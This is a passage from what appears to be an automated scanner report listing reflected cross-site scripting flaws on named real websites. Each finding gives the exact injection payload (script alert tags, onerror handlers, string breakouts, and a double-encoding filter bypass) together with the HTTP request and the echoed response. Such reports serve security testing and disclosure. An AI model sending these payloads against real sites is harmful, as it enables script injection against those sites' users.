Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42e71'%3b29ab7550b80 was submitted in the REST URL parameter 1. This input was echoed as 42e71';29ab7550b80 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico42e71'%3b29ab7550b80 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rent.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:28:26 GMT
Server: Apache
Set-Cookie: session=9bb030827c71ac19fa328ffe95cff5a8/1301603306/6ea9fbdefca927dcfeb86f9d3d84c281; domain=.rent.com; path=/
Set-Cookie: RD=; path=/; expires=Thu, 31-Mar-2011 20:28:56 GMT
Cache-Control: must-revalidate
Expires: Thu, 31 Mar 2011 20:28:27 GMT
Last-Modified: Thu, 31 Mar 2011 20:28:26 GMT
Set-Cookie: browser=1.45121301603306314; path=/; expires=Sun, 28-Mar-21 20:28:26 GMT; domain=.rent.com
P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA'
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.rent.com
Content-Length: 20031


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en" class="no-js">
<head>
<title>Error 404: Page Not Found</title>

<link href="http://media.rent.com/css/renter.css?v=8266
...[SNIP]...
<script type="text/javascript">
$().ready(function() {
next_url = '/favicon.ico42e71';29ab7550b80';
ajax_img = 'http://media.rent.com/img/global/ajax-loader-blue.gif';
signin_box_state = 'closed';

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>
...[SNIP]...

1.98. http://www.rent.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rent.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fca11%2522%253e%253ca%2520b%253dc%253ecba81895b5 was submitted in the REST URL parameter 1. This input was echoed as fca11"><a b=c>cba81895b5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.icofca11%2522%253e%253ca%2520b%253dc%253ecba81895b5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rent.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:28:09 GMT
Server: Apache
Set-Cookie: session=dcbf5a6d2258e368a8c05323f0b2a1df/1301603289/2b952cb52a4a4f5534b9a650013be09f; domain=.rent.com; path=/
Set-Cookie: RD=; path=/; expires=Thu, 31-Mar-2011 20:28:39 GMT
Cache-Control: must-revalidate
Expires: Thu, 31 Mar 2011 20:28:10 GMT
Last-Modified: Thu, 31 Mar 2011 20:28:09 GMT
Set-Cookie: browser=1.224011301603289449; path=/; expires=Sun, 28-Mar-21 20:28:09 GMT; domain=.rent.com
P3P: CP='ALL DSP COR CUR ADMa DEVa TAIa PSAa PSDa CONo OUR IND PHY ONL UNI COM NAV INT STA'
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.rent.com
Content-Length: 20065


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en" class="no-js">
<head>
<title>Error 404: Page Not Found</title>

<link href="http://media.rent.com/css/renter.css?v=8266
...[SNIP]...
<a id="topbar_signin_link_id" class="topbar_signin_link" href="/account/login/" linkname="GlobalHeader_SignIn_Link" rel="/favicon.icofca11"><a b=c>cba81895b5">
...[SNIP]...

1.99. http://www.responsibilityproject.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.responsibilityproject.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f6f7'-alert(1)-'96b9f092301 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1f6f7'-alert(1)-'96b9f092301 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.responsibilityproject.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Thu, 31 Mar 2011 21:10:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=fb4q707ohk79qn2tah1248n3l5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
   <head>
       <meta charset="utf-8" />

       <title>
                               Page Not Found | The Responsibility Project by Liberty Mutual
                           </title>

       <!-- iconography --
...[SNIP]...
<![[CDATA

           var thisPageURL = escape('http://www.responsibilityproject.com/1f6f7'-alert(1)-'96b9f092301');
           var thisPageTitle = escape('Page Not Found');
           var thisContentID = escape('');
           var thisURI = escape('/1f6f7'-alert(1)-'96b9f092301');
           var content_section_a = '';
       
...[SNIP]...

1.100. http://www.responsibilityproject.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.responsibilityproject.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e712f"><script>alert(1)</script>ecf8024d0d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e712f"><script>alert(1)</script>ecf8024d0d3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.responsibilityproject.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Thu, 31 Mar 2011 21:10:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=95f32194gog61h01avva910e92; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
   <head>
       <meta charset="utf-8" />

       <title>
                               Page Not Found | The Responsibility Project by Liberty Mutual
                           </title>

       <!-- iconography --
...[SNIP]...
<link rel="canonical" href="http://www.responsibilityproject.com/e712f"><script>alert(1)</script>ecf8024d0d3" />
...[SNIP]...

1.101. http://www.reverbnation.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reverbnation.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db5c6<img%20src%3da%20onerror%3dalert(1)>dd7dbbc5fa4 was submitted in the REST URL parameter 1. This input was echoed as db5c6<img src=a onerror=alert(1)>dd7dbbc5fa4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.icodb5c6<img%20src%3da%20onerror%3dalert(1)>dd7dbbc5fa4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reverbnation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:32:56 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n-fips Phusion_Passenger/3.0.4
X-Powered-By:
Cache-Control: no-cache
Set-Cookie: _session_id=884715b3384d34cbeb6ab01981c37484; domain=reverbnation.com; path=/; HttpOnly
Content-Length: 21674
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a href="/main/global_search?q=favicon.icodb5c6%3Cimg+src%3Da+onerror%3Dalert%281%29%3Edd7dbbc5fa4" rel="nofollow">Search for 'favicon.icodb5c6<img src=a onerror=alert(1)>dd7dbbc5fa4'</a>
...[SNIP]...

1.102. http://www.schoolfusion.us/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.schoolfusion.us
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6ddc7<script>alert(1)</script>ae658d7d145 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6ddc7<script>alert(1)</script>ae658d7d145 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.schoolfusion.us
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:05:09 GMT
Server: Apache/2.2.8 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 291

<html><body><b>The page you requested:<br/><i>www.schoolfusion.us/favicon.ico6ddc7<script>alert(1)</script>ae658d7d145</i><br/> does not exist on www.schoolfusion.us<br />Please click <a href='http://
...[SNIP]...

1.103. http://www.sciencedirect.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sciencedirect.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 30a56<a>43abf53a120 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico30a56<a>43abf53a120 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sciencedirect.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.0 400 Bad Request
Set-Cookie: EUID=60673594-5bdb-11e0-864e-00000aac4907; expires=Wed, 26 Mar 2031 21:10:59 GMT; path=/; domain=.sciencedirect.com; HttpOnly;
Set-Cookie: MIAMISESSION=60671ff0-5bdb-11e0-864e-00000aac4907:3479058659; path=/; domain=.sciencedirect.com; HttpOnly;
Set-Cookie: MIAMIAUTH=95d30b207384bcbfd9e2501c504dfb10b5668d1216244db2440307c5ce40537c1e1ba1b2047ade3bfd2e753c256d5a4603d6f2929eda015f13405dcc455951ebd5b43153d0752c9fb668caa124d865df712cb0fdb1b1b3bc406b68e17f20dee187a13bdbaf3ee39132146371a9c46a33c9fe98266214abcae5c809050c0046e9ba27c03d98eba27e32d5c127d0ccf5d2d43ba86d12104fc4f95c7a263b003cec820178b15651ce56fba4b44769f70bd9d59c445ba94cba1fe1f5baf14572bce615577cbdd644c79f67b17bd132b3bf03efc75987f667fa1da0be77785a61afd02af37472f084e3f5ea17964f027c9197677f1074c1331c171eec25b4bda4b18d; path=/; domain=.sciencedirect.com; HttpOnly;
Content-Type: text/html
Expires: Tue, 01 Jan 1980 04:00:00 GMT
X-RE-Ref: 0 -1159484509
Server: www.sciencedirect.com 9999 138.12.6.73:80
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" >
<html>
<head>


<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- TRANS
...[SNIP]...
<div class="errMsgText">Sorry, your request could not be processed because the qualifier of the URL (/favicon.ico30a56<a>43abf53a120) is incorrect. Please contact the Help Desk if the problem persists.</div>
...[SNIP]...

1.104. http://www.shangri-la.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shangri-la.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b490'%3bdbd007d93b9 was submitted in the REST URL parameter 1. This input was echoed as 4b490';dbd007d93b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico4b490'%3bdbd007d93b9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shangri-la.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-WebServer-By: WEB02
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://www.shangri-la.com
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 15288
Vary: Accept-Encoding
Cache-Control: private, max-age=58
Date: Thu, 31 Mar 2011 20:24:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<script type="text/javascript">
   var share_page_data={};
   share_page_data.page_url = 'http://www.shangri-la.com/Error404.aspx?404;http://www.shangri-la.com:80/favicon.ico4b490';dbd007d93b9';
   share_page_data.page_name = "Page Not Found";
</script>
...[SNIP]...

1.105. http://www.shopcompanion.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98ff2<img%20src%3da%20onerror%3dalert(1)>c9f80bac6da was submitted in the REST URL parameter 1. This input was echoed as 98ff2<img src=a onerror=alert(1)>c9f80bac6da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /98ff2<img%20src%3da%20onerror%3dalert(1)>c9f80bac6da HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: AMOS/1.0
Date: Thu, 31 Mar 2011 20:48:33 GMT
Content-Type: text/html; charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR NID CURa OUR NOR PHY UNI DEM PRE"
Set-Cookie: AMOS_SID=_live_ticks%3D1301604513071%26live%3DOEzzj%252Eh~ejUhVYhqzmWYVzhZXxzZqYkzjqphWVhhpZwkzeemhj; Path=/; Domain=.shopcompanion.com;
Set-Cookie: AMOS_NS_ID=050; Path=/; Domain=.shopcompanion.com;
Set-Cookie: CC_SRCID=369; Path=/; Domain=www.shopcompanion.com;
Set-Cookie: AMID=2231867481; Path=/; Domain=.shopcompanion.com; Expires=Tuesday, 01-Jan-38 00:00:01 GMT
Set-Cookie: CATALOGCITY_SSNLIVE111=2231867481; Path=/; Domain=.shopcompanion.com;
Set-Cookie: SHOPPER_LOCATION=Monterey%2C+CA%2C+93940%2C+36%2E600111%2C+-121%2E894521%2C+30; Path=/; Domain=www.shopcompanion.com;
Content-Length: 107288

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="stylesheet" t
...[SNIP]...
<span class="span tx_bold">> 98ff2<img src=a onerror=alert(1)>c9f80bac6da</span>
...[SNIP]...

1.106. http://www.sixapart.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sixapart.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8945"><script>alert(1)</script>2ada341c7bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa8945"><script>alert(1)</script>2ada341c7bf HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sixapart.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Thu, 31 Mar 2011 21:37:17 GMT
Server: Apache
Content-Location: error.html.en
Vary: negotiate,accept-language,Accept-Encoding
TCN: choice
X-Powered-By: PHP/5.0.4
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 6092
Content-Type: text/html; charset=UTF-8
Content-Language: en
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<META name="v
...[SNIP]...
<input name="request_uri" type="hidden" value="/favicon.icoa8945"><script>alert(1)</script>2ada341c7bf" />
...[SNIP]...

1.107. http://www.smarter.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.smarter.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5d6d1<a>9b10da1fcf2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /5d6d1<a>9b10da1fcf2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smarter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 20:14:34 GMT
Server: Apache
Loader-Time-Used: 0.00020
Set-Cookie: __mmsid=9eee7f85a661d7d9c066040cb25d1f27; path=/; domain=.smarter.com
Set-Cookie: __mmspn=deleted; expires=Wed, 31-Mar-2010 20:14:33 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmoff=deleted; expires=Wed, 31-Mar-2010 20:14:33 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmuid=e18dd4c91a98b79fd604df03555ac092; expires=Thu, 31-Mar-2016 20:14:34 GMT; path=/; domain=.smarter.com
Set-Cookie: __mmtrk=-1|||11|6d58c7d36d1b6fd571ac2d8b00d2d1af|AwA%3D|0y9O1dUtLNQ1TTFLMVQ1MjV2TgSRrpZJhgYpiYZpyWlGehkluTkA; path=/; domain=.smarter.com
Set-Cookie: qry_lnk=deleted; expires=Wed, 31-Mar-2010 20:14:34 GMT; path=/; domain=.smarter.com
Set-Cookie: qry_ctxt=deleted; expires=Wed, 31-Mar-2010 20:14:34 GMT; path=/; domain=.smarter.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 97498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> 5d6d1<A>9b10da1fcf2
...[SNIP]...
<h2>How to Shop Smarter for 5d6d1<a>9b10da1fcf2: </h2>
...[SNIP]...

1.108. http://www.soft82.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soft82.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d8fdc<script>alert(1)</script>178b6295e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icod8fdc<script>alert(1)</script>178b6295e7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.soft82.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:57:03 GMT
Server: Apache/1.3.42 (Unix) PHP/5.3.4 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=50ba29ed87ed6793c4b0f201b12c11d7; path=/; domain=.soft82.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 87126

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<BASE href="http://www.soft82.com/">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>
...[SNIP]...
<strong>www.soft82.com/favicon.icod8fdc<script>alert(1)</script>178b6295e7</strong>
...[SNIP]...

1.109. http://www.songarea.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.songarea.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e86b0<script>alert(1)</script>b83e4ef8d96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.icoe86b0<script>alert(1)</script>b83e4ef8d96 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songarea.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 21:29:06 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=801180dd0569184c3a9398f7c4c1129a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13441


<html>
<head>
<title>404.php?url= Songs - page: script>b83e4ef8d96</title>


<link rel="STYLESHEET" type="text/css" href="/inc/styles.css">
<link rel="STYLESHEET" type="text/css" href="/inc/tabcont
...[SNIP]...
<td>
                       
The page /inc/404.php?url=/favicon.icoe86b0<script>alert(1)</script>b83e4ef8d96 not found on songarea.com. It might have been removed, had its name changed, is temporarily unavailable.<br>
...[SNIP]...

1.110. http://www.songfacts.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.songfacts.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6235"-alert(1)-"aff2b045367 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icod6235"-alert(1)-"aff2b045367 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songfacts.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:35:15 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.6
Set-Cookie: SongfactsUser=fd2896aa405c6c3adac45c4285d1b5d8; path=/
Connection: close
Content-Type: text/html
Content-Length: 9872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="lt
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1: 2,
c2: "6772046",
c3: "",
c4: "www.songfacts.com/favicon.icod6235"-alert(1)-"aff2b045367",
c5: "",
c6: "",
c15: ""
});
</script>
...[SNIP]...

1.111. http://www.songfacts.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.songfacts.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bacbe"><script>alert(1)</script>9092de6c01 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icobacbe"><script>alert(1)</script>9092de6c01 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songfacts.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 21:35:06 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.6
Set-Cookie: SongfactsUser=c4f893904c8df53240e73d5644aa4df7; path=/
Connection: close
Content-Type: text/html
Content-Length: 9552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="lt
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6772046&amp;c3=&amp;c4=www.songfacts.com/favicon.icobacbe"><script>alert(1)</script>9092de6c01&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="comscorebeacon"/>
...[SNIP]...

1.112. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.songmeanings.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b33bc"><script>alert(1)</script>a51ed548431 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob33bc"><script>alert(1)</script>a51ed548431 HTTP/1.1
